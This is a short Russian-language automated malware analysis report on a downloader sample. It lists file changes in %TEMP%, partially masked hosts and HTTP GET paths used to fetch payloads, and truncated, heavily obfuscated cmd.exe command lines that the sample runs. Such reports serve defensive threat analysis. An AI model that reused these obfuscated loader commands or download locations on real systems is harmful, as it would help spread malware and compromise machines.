Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^For ; /^f ; " tokens= +2 delims=PHWF" , %^c ; iN ; , ( ; ; ' , fT^^Ype , , ^| , , fIN^^d ; , "HCm" ; ' ; ) , ^do ; , %^c; ; , Scmwv2Mlg^/VG^f9[u3R , ; A/r " , ; (s^E...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\880.exe
Удаляет следующие файлы
- %TEMP%\880.exe
Подменяет следующие файлы
- %TEMP%\880.exe
Сетевая активность
Подключается к
- 'be##vet.com':80
- 'in####siafte.com':80
- 'me###at.com.ua':80
- 'me###at.com.ua':443
TCP
Запросы HTTP GET
- http://be##vet.com/KXtjTzw/
- http://in####siafte.com/w2axjo/
- http://me###at.com.ua/plugins/9NufYiT/
Другие
- 'me###at.com.ua':443
UDP
- DNS ASK be##vet.com
- DNS ASK mi##i.net
- DNS ASK re####olet-spb.ru
- DNS ASK in####siafte.com
- DNS ASK me###at.com.ua
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^For ; /^f ; " tokens= +2 delims=PHWF" , %^c ; iN ; , ( ; ; ' , fT^^Ype , , ^| , , fIN^^d ; , "HCm" ; ' ; ) , ^do ; , %^c; ; , Scmwv2Mlg^/VG^f9[u3R , ; A/r " , ; (s^E...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c fT^Ype | fIN^d "HCm"
- '<SYSTEM32>\cmd.exe' /S /D /c" fTYpe "
- '<SYSTEM32>\find.exe' "HCm"
- '<SYSTEM32>\cmd.exe' ; ; , Scmwv2Mlg/VGf9[u3R , ; A/r " , ; (s^Et ^ [~=\ftP^{r^+^/@U'9^.c2NE-k8^,wb}^1j^ozKnAS^:;hvp=$dR^)Y^FaW lg^suCXx^(ymDq5H^TL0ei)&& , for , %^V , ^In ; , ( ^ ^ 36 26 21 +64 ^ ,...
